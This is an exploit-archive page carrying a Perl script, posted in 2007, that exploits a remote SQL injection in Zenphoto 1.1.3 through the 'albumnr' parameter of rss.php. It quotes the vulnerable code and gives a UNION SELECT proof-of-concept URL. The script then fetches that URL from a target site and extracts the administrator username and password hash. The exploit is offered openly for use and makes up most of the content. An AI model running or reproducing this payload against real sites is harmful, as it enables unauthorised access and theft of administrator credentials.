what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

zenphoto-sql.txt

zenphoto-sql.txt
Posted Dec 31, 2007
Authored by Silentz | Site w4ck1ng.com

Zenphoto version 1.1.3 remote SQL injection exploit that makes use of rss.php.

tags | exploit, remote, php, sql injection
SHA-256 | ebea914d89753aa5cf99f22da03cc2a7cef941eb3aefb589e889de51b5c379ea

zenphoto-sql.txt

Change Mirror Download
#!/usr/bin/perl -w

#################################################################################
# #
# Zenphoto 1.1.3 SQL Injection Exploit #
# #
# Discovered by: Silentz #
# Payload: Admin Username & Hash Retrieval #
# Website: http://www.w4ck1ng.com #
# #
# Vulnerable Code (rss.php): #
# #
# $albumnr = $_GET[albumnr]; #
# #
# if ($albumnr != "") #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE albumid = $albumnr #
# AND `show` = 1 ORDER BY id DESC LIMIT ".$items;} #
# else #
# { $sql = "SELECT * FROM ". prefix("images") ." WHERE `show` = 1 ORDER #
# BY id DESC LIMIT ".$items; } #
# #
# PoC: http://victim.com/zenphoto/rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT #
# value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13) #
# ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, #
# 0,0,0,0/* #
# #
# Subject To: Nothing! #
# GoogleDork: Get your own! #
# #
# Shoutz: The entire w4ck1ng community #
# #
# NOTE: The vulnerbility exists in versions 1.1, 1.1.1, 1.1.2 & 1.1.3 BUT you'd #
# have to alter the payload in order to make it work for any versions #
# other than 1.1.3. #
# #
#################################################################################

use LWP::UserAgent;
die "Example: exploit.pl http://victim.com/\n" unless @ARGV;

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

$host = $ARGV[0] . "rss.php?albumnr=1 UNION SELECT 0,0,0,(SELECT value FROM zp_options WHERE id=12),(SELECT value FROM zp_options WHERE id=13),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*";

$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;

if ($answer =~ /<webMaster>(.*?)<\/webMaster>/){
print "\nBrought to you by w4ck1ng.com...\n";
print "\n[+] Admin User : $1";
}

if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";}

else{print "\n[-] Exploit Failed...\n";}
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close